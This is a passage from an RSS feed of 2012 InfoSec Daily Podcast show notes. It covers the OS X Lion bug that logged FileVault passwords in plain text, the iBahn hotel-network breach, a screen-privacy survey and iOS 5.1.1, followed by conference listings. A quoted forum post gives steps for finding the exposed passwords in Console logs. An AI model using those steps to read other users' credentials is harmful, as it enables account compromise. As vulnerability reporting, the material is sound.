<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As you may have seen over the weekend, someone has discovered a security hole in FileVault, which arose with the OS X Lion security update, version 10.7.3, back in February: FileVault encryption passwords are now visible in plain text outside of a computer&rsquo;s encrypted area.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hole was apparently spotted by someone back in February, although it was most publicly first pointed out by security consultant David Emery on the </span><a href="http://cryptome.org/2012/05/apple-filevault-hole.htm"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Cryptome</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> blog a few days ago and the rest of the blogosphere has run with it.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, it appears that the problem could be bigger than previously thought: it turns out that the </span><a href="https://discussions.apple.com/thread/3715366"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">developer who first noticed the hole back in February</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> has discovered that it exists outside of FileVault, too, with at least one other company&rsquo;s security encryption software, Lion VM, from VMWare Fusion, showing the same behavior.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">From earlier this morning, </span><a href="https://discussions.apple.com/message/18320465#18320465"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">he wrote</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, in answer to his own thread started in February:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;m not sure if I can support the assumption that this is an error in filevault.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&rsquo;ve just tried logging in as an network user in an newly setup and updated Lion VM (VMware Fusion) and run into the same behavior. Filevault was never active on this system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Can someone with the following environment please verify:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- OpenDirectory users with Network Home on AFP</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Lion (10.7.3) Clients</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Snow Leopard or Lion Server</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Steps:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Setup a new machine, or use one that never had filevault enabled</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Login as a (unprivileged!) network user with a Network Home on an AFP share</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- logout, login as an admin user</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">- Check &ldquo;Console&rdquo; for log messages containing the string &ldquo;_premountHomedir&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please help to get to the bottom of this!</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security hole, as it exists in Apple&rsquo;s own FileVault (and potentially other) encryption software, means that passwords for the encrypted part of a person&rsquo;s computer are revealed in plain text to a user who knows where to look. As Sophos&rsquo; Naked Security blog </span><a href="http://nakedsecurity.sophos.com/2012/05/06/apple-update-to-os-x-lion-exposes-encryption-passwords/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">notes</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone with access to the disk can read the file containing the password and use it to log into the encrypted area of the disk, rendering the encryption pointless and permitting access to potentially sensitive documents. This could occur through theft, physical access, or a piece of malware that knows where to look.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That is yet another reminder of how, although we hear a lot about passwords needing to be &nbsp;&nbsp;cryptic enough, ultimately if the encryption falls down on implementation, those passwords will be useless anyway. &ldquo;How products store, manage and secure keys and passwords is the most common failure point in assuring data protection,&rdquo; Chester Wisniewski of Sophos points out.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The advice he gives is to upgrade to a full-disc solution, such as FileVault 2 or another, and also to change your passwords if you&rsquo;re a FileVault user.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.thejakartapost.com/news/2012/05/08/chinese-hackers-steal-private-data-760-firms.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thejakartapost.com/news/2012/05/08/chinese-hackers-steal-private-data-760-firms.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">China-based hackers are reportedly targeting US-based Google Inc and Intel Corp. &nbsp;An attack hackers launched on iBahn could help them access secret e-mails, even encrypted ones, according to a US senior intelligence official familiar with the matter.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As many as 760 companies have had their data accessed by hackers through iBahn, which runs broadband business and provides entertainment access for guests of Marriott International Inc&rsquo;s global network and other hotel chains, as well as for multinational companies that hold meetings in the hotels.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Internet security company Trustwave Corp SpiderLabs chief Nick Percoco said what was more concerning was that hackers might have used the iBahn system as a stepping stone to connect to companies linked to the system by creating a &ldquo;secret backdoor&rdquo; through employees who had stayed in one of the hotel chains.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Companies were not the only target over the past decade, he said, but also research universities, internet providers and government institutions. Among the victims are Research in Motion Ltd (RIM), Boston Scientific Corp and other innovative companies in the military, semiconductor, pharmaceutical and biotechnology sectors, according to Bloomberg data.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Bloomberg, the espionage industry has become an integral part of the Chinese government&rsquo;s economic policy.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.net-security.org/secworld.php?id=12877"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/secworld.php?id=12877</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oculis Labs released results from its &ldquo;Government Worker Privacy&rdquo; survey on privacy risks for mobile workers. 104 people were randomly surveyed at this year&rsquo;s FOSE conference and exposition in Washington D.C., and of those surveyed, 62 percent are concerned about others looking at their displays while 63 percent admit to having looked at other people&rsquo;s displays.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While it is no surprise that almost everyone (98 percent) claims that privacy is important to them, an astonishing 82 percent of government employees have no security system for protecting their computer screens.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The survey found that 69 percent of respondents use their computers in public places to view sensitive information. In fact, most respondents indicated they work with multiple types of sensitive information.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fifty-seven percent stated that they work with financial/credit card data; 18 percent work with For Official Use Only (FOUO) information (this is primarily used by the United States Department of Defense as a handling instruction for Controlled Unclassified Information); 18 percent work with human resources data and 19 percent work with classified information.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While protecting data on computers is top of mind for everyone, most organizations are focused on conventional security technologies such as anti-virus software, personal firewalls and spam filters. The WikiLeaks episode clearly revealed one crucial fact &ndash; the government did not have adequate protections on sensitive data, and the status quo of traditional security tools and official policy could not stop a breach.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Besides tightening up controls on removable media, WikiLeaks underscores the need for the government to start looking at a system the way an attacker does &ndash; by looking for the weakest links. The majority of breaches are made through social engineering attacks that start with simple observation. Adversaries, especially insiders, start by observing computer screens surreptitiously to launch their attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-663-dying-tech-ios-5-1-1-bigger-than-we-think-760-firms-hacked-and-unprotected-leakage/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3918/0/infosec-daily-podcast-episode-663.mp3" length="20484643" type="audio/mpeg" />
		<itunes:duration>0:42:40</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 663 for May 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Dr. Bonez.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	Wh[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 663 for May 8, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Themson Mester, and Dr. Bonez.
&#160;
Announcements
GraniteSec (formerly The New England InfoSec Tweetup)
	When: &#160;May 19, 2012&#160;&#160;&#160; 
	Where: &#160;Veasey Memorial Park, Groveland, MA
	http://granitesec.org
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
	When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Hack3rCon^3
When: October 19-21, 2012
Where: Charleston, WV 
	http://hack3rcon.org/ 
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.
Amazon:
Amazon UK:
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://www.telegraph.co.uk/technology/picture-galleries/8600909/Dying-technology-modern-hardware-thats-on-the-way-out.html?image=11


Blackberry&#8217;s


Video and digital cameras


MP3 Players


eReaders


Physical Storage Media


Keyboards


Cables


Newspaper


Televisions *


Landlines


Fax Machines


Keys


&#8230;
Source: &#160;http://news.cnet.com/8301-13579_3-57429285-37/apple-launches-ios-5.1.1-to-address-bugs/
Apple has launched an update to its iOS platform. &#160;The company&#39;s iOS 5.1.1 update comes with bug fixes for AirPlay video playback and the &#34;Unable to purchase&#34; error message popping up after users buy something from their device. In addition, Apple fixed a bug that prevented the new iPad from switching between 2G and 3G networks.
Apple&#39;s iOS 5.1.1 update comes just a couple of months after the company revealed iOS 5.1. That update delivered a host of new bug fixes, a few interface tweaks, and even a hint that the next iPhone could come with 4G LTE support. Some reports suggested the operating system version also improved the platform&#39;s battery life.
iOS 5.1.1 is available now as a free download. Current iOS 5 users can head over to their General &#62; Software Update pane to install the new software.
&#8230;
Source: &#160;http://techcrunch.com/2012/05/07/mac-lion-security-passwords/
As you may have seen over the weekend, someone has discovered a security hole in FileVault, which arose with the OS X Lion security update, version 10.7.3, back in February: FileVault encryption passwords are now visible in plain text outside of a computer&#8217;s encrypted area.
The hole was apparently spotted by someone back in February, although it was most publicly first pointed out by security consultant David Emery on the Cryptome blog a few days ago and the rest of the blogosphere has run with it.
Now, it appears that the problem could be bigger than previously thought: it turns out that the developer who f[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 662 &#8211; Crims Quit Spamming?, OS X Exposure, Symantec Extortion, Natural Gas Attack, and Tap Ready Sites</title>
		<link>http://www.isdpodcast.com/episode-662-crims-quit-spamming-os-x-exposure-symantec-extortion-natural-gas-attack-and-tap-ready-sites</link>
		<comments>http://www.isdpodcast.com/episode-662-crims-quit-spamming-os-x-exposure-symantec-extortion-natural-gas-attack-and-tap-ready-sites#comments</comments>
		<pubDate>Tue, 08 May 2012 01:11:17 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3915</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 662 for May 7, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan. &#160; Announcements GraniteSec (formerly The New England InfoSec Tweetup) When: &#160;May 19, 2012&#160;&#160;&#160; Where: &#160;Veasey Memorial Park, Groveland, MA http://granitesec.org &#160; AIDE 2012 When: May 21-25, 2012 Where: MU Forensic [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" id="internal-source-marker_0.9362180193456356" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 662 for May 7, 2012. &nbsp;</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">GraniteSec (formerly The New England InfoSec Tweetup)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;May 19, 2012&nbsp;&nbsp;&nbsp; <br class="kix-line-break" /><br />
	Where: &nbsp;Veasey Memorial Park, Groveland, MA<br class="kix-line-break" /><br />
	</span><a href="http://granitesec.org"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://granitesec.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &#8211; Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA <br class="kix-line-break" /><br />
	</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
